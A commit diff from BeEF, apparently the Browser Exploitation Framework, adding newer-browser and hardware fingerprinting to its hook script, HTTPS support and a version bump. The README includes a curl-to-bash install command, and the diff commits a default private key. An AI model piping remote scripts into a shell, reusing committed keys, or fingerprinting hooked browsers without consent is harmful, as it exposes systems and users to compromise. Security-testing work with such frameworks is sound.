Added support for Safari 6.

Make sense. Thanks!

Gemfile

@@ -39,6 +39,9 @@ gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
 
+# notifications
+gem "twitter"
+
 if ENV['BEEF_TEST']
 # for running unit tests
   gem "test-unit"

README.mkd

@@ -72,7 +72,7 @@ __The following is for the impatient.__
 
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
 
-       $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 
 
 Usage 

VERSION

@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.5-alpha
+0.4.3.6-alpha

beef_cert.pem

@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
+VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
+BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
+bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
+dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
+BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
+MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
+eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
+cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
+VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
+0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
+F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
+kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
+kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
+B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
+JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
+GkY0IBg9+j6XX4JwEXxCGt0a
+-----END CERTIFICATE-----

beef_key.pem

@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
+X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
+KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
+0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
+HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
+4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
+5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
+26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
+yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
+rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
+AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
+QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
+WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
+yBgay+U9QuoEO425
+-----END PRIVATE KEY-----

config.yaml

@@ -16,7 +16,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.5-alpha'
+    version: '0.4.3.6-alpha'
     debug: false
 
     restrictions:
@@ -43,7 +43,7 @@ beef:
         websocket:
           enable: false
           secure: false # use WebSocketSecure
-          port: 11989
+          port: 61985 # good success rate through proxies
           alive_timer: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -51,6 +51,14 @@ beef:
             enable: false
             type: "apache" #supported: apache, iis
 
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
     database:
         # For information on using other databases please read the
         # README.databases file

core/core.rb

@@ -34,6 +34,7 @@ require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
+require 'core/main/constants/hardware'
 
 # @note Include core modules for beef
 require 'core/main/configuration'

core/filters/browser.rb

@@ -47,6 +47,16 @@ module Filters
     true
   end
 
+  # Check the Hardware name value - for example, 'iPhone'
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid Hardware name characters
+  def self.is_valid_hwname?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length < 2
+    true
+  end
+
   # Verify the browser version string is valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser version characters

core/main/client/are.js

@@ -0,0 +1,11 @@
+
+beef.are = {
+  init:function(){
+   var Jools = require('jools');
+   this.ruleEngine = new Jools();
+  },
+  rules:[],
+  commands:[],
+  results:[]
+};
+beef.regCmp("beef.are");

core/main/client/browser.js

@@ -180,12 +180,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null;
 	},
 
+	/**
+	 * Returns true if FF14
+	 * @example: beef.browser.isFF14()
+	 */
+	isFF14: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14();
 	},
 
 	/**
@@ -203,13 +211,21 @@ beef.browser = {
 	isS5: function() {
 		return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
 	},
+
+    /**
+     * Returns true if Safari 6.xx
+     * @example: beef.browser.isS6()
+     */
+    isS6: function() {
+        return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+    },
 	
 	/**
 	 * Returns true if Safari.
 	 * @example: beef.browser.isS()
 	 */
 	isS: function() {
-		return this.isS4() || this.isS5() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return this.isS4() || this.isS5() || this.isS6() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
 	},
 
 	/**
@@ -332,12 +348,28 @@ beef.browser = {
 		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==19)?true:false);
 	},
 
+	/**
+	 * Returns true if Chrome 20.
+	 * @example: beef.browser.isC20()
+	 */
+	isC20: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==20)?true:false);
+	},
+
+    /**
+     * Returns true if Chrome 21.
+     * @example: beef.browser.isC21()
+     */
+    isC21: function() {
+        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
+    },
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21();
 	},
 
 	/**
@@ -372,12 +404,20 @@ beef.browser = {
            return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
        },
 
+        /**
+         * Returns true if Opera 12.xx.
+         * @example: beef.browser.isO12()
+         */
+        isO12: function() {
+            return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
+        },
+
 	/**
 	 * Returns true if Opera.
 	 * @example: beef.browser.isO()
 	 */
 	isO: function() {
-		return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11();
+		return this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
 	},
 		
 	/**
@@ -404,6 +444,8 @@ beef.browser = {
             C17:	this.isC17(),	// Chrome 17
 			C18:	this.isC18(),	// Chrome 18
 			C19:	this.isC19(),	// Chrome 19
+			C20:	this.isC20(),	// Chrome 20
+            C21:	this.isC21(),	// Chrome 21
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -420,6 +462,7 @@ beef.browser = {
 			FF11:	this.isFF11(),	// Firefox 11
 			FF12:	this.isFF12(),	// Firefox 12
 			FF13:	this.isFF13(),	// Firefox 13
+			FF14:	this.isFF14(),	// Firefox 14
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -432,10 +475,12 @@ beef.browser = {
 			O9_60:  this.isO9_60(), // Opera 9.60 through 9.64
 			O10:    this.isO10(),  	// Opera 10.xx
 			O11:    this.isO11(),  	// Opera 11.xx
+            O12:    this.isO12(),  	// Opera 11.xx
 			O:      this.isO(), 	// Opera any version
 
 			S4:	this.isS4(),	// Safari 4.xx
 			S5:	this.isS5(),	// Safari 5.xx
+            S6: this.isS6(),   // Safari 6.x
 			S:	this.isS()	// Safari any version
 		}
 	},
@@ -463,8 +508,10 @@ beef.browser = {
         if (this.isC17())	{ return '17' };	// Chrome 17
 		if (this.isC18())   { return '18' };    // Chrome 18
 		if (this.isC19())   { return '19' };    // Chrome 19
+		if (this.isC20())	{ return '20' };	// Chrome 20
+        if (this.isC21())	{ return '21' };	// Chrome 21
 
-		if (this.isFF2())	{ return '2'  };	// Firefox 2
+        if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3
 		if (this.isFF3_5())	{ return '3.5'};	// Firefox 3.5
 		if (this.isFF3_6())	{ return '3.6'};	// Firefox 3.6
@@ -478,6 +525,7 @@ beef.browser = {
 		if (this.isFF11())	{ return '11' };	// Firefox 11
 		if (this.isFF12())	{ return '12' };	// Firefox 12
 		if (this.isFF13())	{ return '13' };	// Firefox 13
+		if (this.isFF14())	{ return '14' };	// Firefox 14
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
@@ -486,11 +534,13 @@ beef.browser = {
 
 		if (this.isS4())	{ return '4'  };	// Safari 4
 		if (this.isS5())	{ return '5'  };	// Safari 5
+        if (this.isS6())	{ return '6'  };	// Safari 5
 
-		if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
+        if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
 		if (this.isO9_60())	{ return '9.6'};	// Opera 9.6
 		if (this.isO10())	{ return '10' };	// Opera 10.xx
 		if (this.isO11())	{ return '11' };	// Opera 11.xx
+        if (this.isO12())	{ return '12' };	// Opera 12.xx
 
 		return 'UNKNOWN';				// Unknown UA
 	},
@@ -551,6 +601,19 @@ beef.browser = {
 	
 	},
 
+	/**
+	 * Checks if the Phonegap API is available from the hooked domain.
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if(beef.browser.hasJava()) { ... }
+	*/
+	hasPhonegap: function() {
+		var result = false;
+		try { if (!!device.phonegap) result = true; else result = false; }
+		catch(e) { result = false; }
+		return result;
+	},
+
 	/**
 	 * Checks if the zombie has Java installed and enabled.
 	 * @return: {Boolean} true or false.
@@ -765,6 +828,7 @@ beef.browser = {
 		var browser_plugins = beef.browser.getPlugins();
 		var date_stamp = new Date().toString();
 		var os_name = beef.os.getName();
+		var hw_name = beef.hardware.getName();
 		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
 		var screen_size = beef.browser.getScreenSize();
@@ -772,6 +836,7 @@ beef.browser = {
 		var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
 		var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
 		var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
+		var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No";
 		var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
 		var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
 		var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No";
@@ -789,6 +854,7 @@ beef.browser = {
 		if(hostport) details["HostPort"] = hostport;
 		if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
 		if(os_name) details['OsName'] = os_name;
+		if(hw_name) details['Hardware'] = hw_name;
 		if(date_stamp) details['DateStamp'] = date_stamp;
 		if(system_platform) details['SystemPlatform'] = system_platform;
 		if(browser_type) details['BrowserType'] = browser_type;
@@ -797,6 +863,7 @@ beef.browser = {
 		if(java_enabled) details['JavaEnabled'] = java_enabled;
 		if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
 		if(has_flash) details['HasFlash'] = has_flash
+		if(has_phonegap) details['HasPhonegap'] = has_phonegap
 		if(has_web_socket) details['HasWebSocket'] = has_web_socket
 		if(has_googlegears) details['HasGoogleGears'] = has_googlegears
 		if(has_activex) details['HasActiveX'] = has_activex;

core/main/client/hardware.js

@@ -0,0 +1,91 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.hardware = {
+
+	ua: navigator.userAgent,
+	
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+	
+	isIphone: function() {
+		return (this.ua.indexOf('iPhone') != -1) ? true : false;
+	},
+
+	isIpad: function() {
+		return (this.ua.indexOf('iPad') != -1) ? true : false;
+	},
+
+	isIpod: function() {
+		return (this.ua.indexOf('iPod') != -1) ? true : false;
+	},
+
+	isNokia: function() {
+		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+	},
+
+	isBlackBerry: function() {
+		return (this.ua.match('BlackBerry')) ? true : false;
+	},
+
+	isZune: function() {
+		return (this.ua.match('ZuneWP7')) ? true : false;
+	},
+
+	isKindle: function() {
+		return (this.ua.match('Kindle')) ? true : false;
+	},
+
+	isHtc: function() {
+		return (this.ua.match('HTC')) ? true : false;
+	},
+
+	isEricsson: function() {
+		return (this.ua.match('Ericsson')) ? true : false;
+	},
+
+	isNokia: function() {
+		return (this.ua.match('Nokia')) ? true : false;
+	},
+
+	isMotorola: function() {
+		return (this.ua.match('Motorola')) ? true : false;
+	},
+
+	isGoogle: function() {
+		return (this.ua.match('Nexus One')) ? true : false;
+	},
+
+	getName: function() {
+
+		if (this.isNokia()) return 'Nokia';
+		if (this.isWinPhone()) return 'Windows Phone';
+		if (this.isBlackBerry()) return 'BlackBerry';
+		if (this.isIphone()) return 'iPhone';
+		if (this.isIpad()) return 'iPad';
+		if (this.isIpod()) return 'iPod';
+		if (this.isKindle()) return 'Kindle';
+		if (this.isHtc()) return 'HTC';
+		if (this.isMotorola()) return 'Motorola';
+		if (this.isZune()) return 'Zune';
+		if (this.isGoogle()) return 'Google';
+		if (this.isEricsson()) return 'Ericsson';
+
+		return 'Unknown';
+	}
+};
+
+beef.regCmp('beef.net.hardware');

core/main/client/init.js

@@ -66,6 +66,7 @@ function beef_init() {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.logger.start();
+            beef.are.init();
 
         }
         else {
@@ -73,6 +74,7 @@ function beef_init() {
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
+            beef.are.init();
         }
 
     }

core/main/client/net.js

@@ -23,6 +23,7 @@ beef.net = {
     host:"<%= @beef_host %>",
     port:"<%= @beef_port %>",
     hook:"<%= @beef_hook %>",
+    httpproto:"<%= @beef_proto %>",
     handler:'/dh',
     chop:500,
     pad:30, //this is the amount of padding for extra params such as pc, pid and sid
@@ -137,7 +138,7 @@ beef.net = {
     push:function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
-            this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
         }
     },
 

core/main/client/os.js

@@ -72,7 +72,11 @@ beef.os = {
 	isMacintosh: function() {
 		return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
 	},
-	
+
+	isWinPhone: function() {
+		return (this.ua.match('(Windows Phone)')) ? true : false;
+	},
+
 	isIphone: function() {
 		return (this.ua.indexOf('iPhone') != -1) ? true : false;
 	},
@@ -97,6 +101,10 @@ beef.os = {
 		return (this.ua.match('BlackBerry')) ? true : false;
 	},
 
+	isWebOS: function() {
+		return (this.ua.match('webOS')) ? true : false;
+	},
+
 	isQNX: function() {
 		return (this.ua.match('QNX')) ? true : false;
 	},
@@ -139,11 +147,14 @@ beef.os = {
 		if(this.isSunOS()) return 'Sun OS';
 
 		//iPhone
-		if (this.isIphone()) return 'iPhone';
+		if (this.isIphone()) return 'iOS';
 		//iPad
-		if (this.isIpad()) return 'iPad';
+		if (this.isIpad()) return 'iOS';
 		//iPod
-		if (this.isIpod()) return 'iPod';
+		if (this.isIpod()) return 'iOS';
+
+		// zune
+		//if (this.isZune()) return 'Zune';
 		
 		//macintosh
 		if(this.isMacintosh()) {
@@ -156,6 +167,7 @@ beef.os = {
 		//others
 		if(this.isQNX()) return 'QNX';
 		if(this.isBeOS()) return 'BeOS';
+		if(this.isWebOS()) return 'webOS';
 		
 		return 'unknown';
 	}

core/main/client/updater.js

@@ -66,7 +66,7 @@ beef.updater = {
 	get_commands: function(http_response) {
 		try {
 			this.lock = true;
-            beef.net.request('http', 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });

core/main/console/banners.rb

@@ -89,12 +89,13 @@ module Banners
 
     def print_network_interfaces_routes
       configuration = BeEF::Core::Configuration.instance
+      prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
       
       self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
-        data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
         
         print_more data
       end

core/main/constants/hardware.rb

@@ -0,0 +1,89 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+module Core
+module Constants
+  
+  # @note The hardware's strings for hardware detection.
+  module Hardware
+
+    HW_UNKNOWN_IMG        = 'pc.png'
+	HW_IPHONE_UA_STR      = 'iPhone'
+ 	HW_IPHONE_IMG         = 'iphone.jpg'
+	HW_IPAD_UA_STR	      = 'iPad'
+	HW_IPAD_IMG	          = 'ipad.png'
+	HW_IPOD_UA_STR	      = 'iPod'
+	HW_IPOD_IMG	          = 'ipod.jpg'
+	HW_BLACKBERRY_UA_STR  = 'BlackBerry'
+	HW_BLACKBERRY_IMG     = 'blackberry.png'
+	HW_WINPHONE_UA_STR    = 'Windows Phone'
+	HW_WINPHONE_IMG       = 'win.png'
+    HW_ZUNE_UA_STR        = 'ZuneWP7'
+    HW_ZUNE_IMG           = 'zune.gif'
+	HW_KINDLE_UA_STR      = 'Kindle'
+	HW_KINDLE_IMG         = 'kindle.png'
+	HW_NOKIA_UA_STR       = 'Nokia'
+	HW_NOKIA_IMG          = 'nokia.ico'
+	HW_HTC_UA_STR         = 'HTC'
+	HW_HTC_IMG            = 'htc.ico'
+	HW_MOTOROLA_UA_STR    = 'motorola'
+	HW_MOTOROLA_IMG       = 'motorola.png'
+	HW_GOOGLE_UA_STR      = 'Nexus One'
+	HE_GOOGLE_IM          = 'nexus.png'
+	HW_ERICSSON_UA_STR    = 'Ericsson'
+	HW_ERICSSON_IMG       = 'sony_ericsson.png'
+	HW_ALL_UA_STR         = 'All'
+
+        # Attempt to match operating system string to constant
+        # @param [String] name Name of operating system
+        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
+		def self.match_hardware(name)
+			case name.downcase
+				when /iphone/
+					HW_IPHONE_UA_STR
+				when /ipad/
+					HW_IPAD_UA_STR
+				when /ipod/
+					HW_IPOD_UA_STR
+				when /blackberry/
+					HW_BLACKBERRY_UA_STR
+				when /windows phone/
+					HW_WINPHONE_UA_STR
+				when /zune/
+					HW_ZUNE_UA_STR
+				when /kindle/
+					HW_KINDLE_UA_STR
+				when /nokia/
+					HW_NOKIA_UA_STR
+				when /motorola/
+					HW_MOTOROLA_UA_STR
+				when /htc/
+					HW_HTC_UA_STR
+				when /google/
+					HW_GOOGLE_UA_STR
+				when /ericsson/
+					HW_ERICSSON_UA_STR
+				else
+					'ALL'
+				end
+		end
+	
+  end
+  
+end
+end
+end

core/main/constants/os.rb

@@ -15,75 +15,74 @@
 #
 
 module BeEF
-module Core
-module Constants
-  
-  # @note The OS'es strings for os detection.
-  module Os
-  
-    OS_UNKNOWN_IMG        = 'unknown.png'
-  	OS_WINDOWS_UA_STR     = 'Windows'
-  	OS_WINDOWS_IMG        = 'win.png'
-  	OS_LINUX_UA_STR       = 'Linux'
-  	OS_LINUX_IMG          = 'linux.png'
-  	OS_MAC_UA_STR         = 'Mac'
-  	OS_MAC_IMG            = 'mac.png'
-	OS_QNX_UA_STR	      = 'QNX'
-	OS_QNX_IMG	      = 'qnx.ico'
-	OS_BEOS_UA_STR	      = 'BeOS'
-	OS_BEOS_IMG	      = 'beos.png'
-	OS_OPENBSD_UA_STR     = 'OpenBSD'
-	OS_OPENBSD_IMG	      = 'openbsd.ico'
-	OS_IPHONE_UA_STR      = 'iPhone'
- 	OS_IPHONE_IMG         = 'iphone.png'
-	OS_IPAD_UA_STR	      = 'iPad'
-	OS_IPAD_IMG	      = 'ipad.png'
-	OS_IPOD_UA_STR	      = 'iPod'
-	OS_IPOD_IMG	      = 'ipod.jpg'
-	OS_MAEMO_UA_STR	      = 'Maemo'
-	OS_MAEMO_IMG	      = 'maemo.ico'
-	OS_BLACKBERRY_UA_STR  = 'BlackBerry'
-	OS_BLACKBERRY_IMG     = 'blackberry.png'
-	OS_ANDROID_UA_STR     = 'Android'
-	OS_ANDROID_IMG        = 'android.png'
-    OS_ALL_UA_STR         = 'All'
+  module Core
+    module Constants
+
+      # @note The OS'es strings for os detection.
+      module Os
+
+        OS_UNKNOWN_IMG = 'unknown.png'
+        OS_WINDOWS_UA_STR = 'Windows'
+        OS_WINDOWS_IMG = 'win.png'
+        OS_LINUX_UA_STR = 'Linux'
+        OS_LINUX_IMG = 'linux.png'
+        OS_MAC_UA_STR = 'Mac'
+        OS_MAC_IMG = 'mac.png'
+        OS_QNX_UA_STR = 'QNX'
+        OS_QNX_IMG = 'qnx.ico'
+        OS_BEOS_UA_STR = 'BeOS'
+        OS_BEOS_IMG = 'beos.png'
+        OS_OPENBSD_UA_STR = 'OpenBSD'
+        OS_OPENBSD_IMG = 'openbsd.ico'
+        OS_IOS_UA_STR = 'iOS'
+        OS_IOS_IMG = 'ios.png'
+        OS_IPHONE_UA_STR = 'iPhone'
+        OS_WEBOS_UA_STR = 'webos.png'
+        OS_IPHONE_IMG = 'iphone.jpg'
+        OS_IPAD_UA_STR = 'iPad'
+        OS_IPAD_IMG = 'ipad.png'
+        OS_IPOD_UA_STR = 'iPod'
+        OS_IPOD_IMG = 'ipod.jpg'
+        OS_MAEMO_UA_STR = 'Maemo'
+        OS_MAEMO_IMG = 'maemo.ico'
+        OS_BLACKBERRY_UA_STR = 'BlackBerry'
+        OS_BLACKBERRY_IMG = 'blackberry.png'
+        OS_ANDROID_UA_STR = 'Android'
+        OS_ANDROID_IMG = 'android.png'
+        OS_ALL_UA_STR = 'All'
 
         # Attempt to match operating system string to constant
         # @param [String] name Name of operating system
         # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
-		def self.match_os(name)
-			case name.downcase
-				when /win/
-					OS_WINDOWS_UA_STR
-				when /lin/
-					OS_LINUX_UA_STR
-				when /os x/, /osx/, /mac/
-					OS_MAC_UA_STR
-				when /qnx/
-					OS_QNX_UA_STR
-				when /beos/
-					OS_BEOS_UA_STR
-				when /openbsd/
-					OS_OPENBSD_UA_STR
-				when /iphone/
-					OS_IPHONE_UA_STR
-				when /ipad/
-					OS_IPAD_UA_STR
-				when /ipod/
-					OS_IPOD_UA_STR
-				when /maemo/
-					OS_MAEMO_UA_STR
-				when /blackberry/
-					OS_BLACKBERRY_UA_STR
-				when /android/
-					OS_ANDROID_UA_STR
-				else
-					'ALL'
-				end
-		end
-	
+        def self.match_os(name)
+          case name.downcase
+            when /win/
+              OS_WINDOWS_UA_STR
+            when /lin/
+              OS_LINUX_UA_STR
+            when /os x/, /osx/, /mac/
+              OS_MAC_UA_STR
+            when /qnx/
+              OS_QNX_UA_STR
+            when /beos/
+              OS_BEOS_UA_STR
+            when /openbsd/
+              OS_OPENBSD_UA_STR
+            when /ios/, /iphone/, /ipad/, /ipod/
+              OS_IOS_UA_STR
+            when /maemo/
+              OS_MAEMO_UA_STR
+            when /blackberry/
+              OS_BLACKBERRY_UA_STR
+            when /android/
+              OS_ANDROID_UA_STR
+            else
+              'ALL'
+          end
+        end
+
+      end
+
+    end
   end
-  
-end
-end
 end

core/main/handlers/browserdetails.rb

@@ -118,6 +118,14 @@ module BeEF
             self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
           end
 
+          # get and store the hardware name
+          hw_name = get_param(@data['results'], 'Hardware')
+          if BeEF::Filters.is_valid_hwname?(hw_name)
+            BD.set(session_id, 'Hardware', hw_name)
+          else
+            self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+          end
+
           # get and store the date
           date_stamp = get_param(@data['results'], 'DateStamp')
           if BeEF::Filters.is_valid_date_stamp?(date_stamp)
@@ -222,6 +230,14 @@ module BeEF
